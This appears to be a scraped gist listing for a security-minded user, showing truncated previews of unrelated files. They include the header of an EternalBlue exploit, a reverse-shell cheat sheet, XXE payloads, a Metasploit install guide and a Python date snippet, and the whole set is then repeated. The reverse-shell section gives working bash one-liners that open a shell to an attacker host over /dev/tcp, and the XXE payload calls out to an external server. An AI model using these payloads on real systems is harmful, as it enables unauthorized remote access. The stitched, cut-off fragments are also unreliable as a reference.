h3litz

## eternalblue8_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

## sqlmap_api.dockerfile
FROM python:2.7

ENV VERSION 1.0.11

RUN apt-get update && apt-get install -y \
  git --no-install-recommends

RUN mkdir /app

WORKDIR /app

## macosx_remove_java9.sh
sudo rm -fr /Library/Java/JavaVirtualMachines/jdk-9.jdk/
sudo rm -fr /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin
sudo rm -fr /Library/PreferencePanes/JavaControlPanel.prefPane


## reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#bash alt
exec /bin/bash 0&0 2>&0

#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

#bash alt 3

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## install-metasploit-osx.md

      
              1 file
            
          
              3 forks
            
          
              2 comments
            
          
              17 stars
            
          
                holms
                / install-metasploit-osx.md
            
            
              Last active
              August 19, 2023 19:12
            
              
                Install Metasploit with Armitage on OSX Maverics
              
          
    Install Metasploit (with Armitage) on OSX Maverics

Requirements


Install Xcode - http://developer.apple.com/tools/xcode/
Install PostgreSQL - http://www.enterprisedb.com/products-services-training/pgdownload#osx

PostgreSQL

  
## time.py
import time
from datetime import datetime, date

# 今天
datetime.datetime.today().date().isoformat()

# 通过日期对象生成时间戳
int(time.mktime(datetime.now().timetuple()))

# 通过时间戳生成日期对象，timestamp 的时间戳以秒为单位
	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb, ntlm
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)
	FROM python:2.7

	ENV VERSION 1.0.11

	RUN apt-get update && apt-get install -y \
	git --no-install-recommends

	RUN mkdir /app

	WORKDIR /app
	sudo rm -fr /Library/Java/JavaVirtualMachines/jdk-9.jdk/
	sudo rm -fr /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin
	sudo rm -fr /Library/PreferencePanes/JavaControlPanel.prefPane
	#bash
	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

	#bash alt
	exec /bin/bash 0&0 2>&0

	#bash alt 2
	0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

	#bash alt 3
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	import time
	from datetime import datetime, date

	# 今天
	datetime.datetime.today().date().isoformat()

	# 通过日期对象生成时间戳
	int(time.mktime(datetime.now().timetuple()))

	# 通过时间戳生成日期对象，timestamp 的时间戳以秒为单位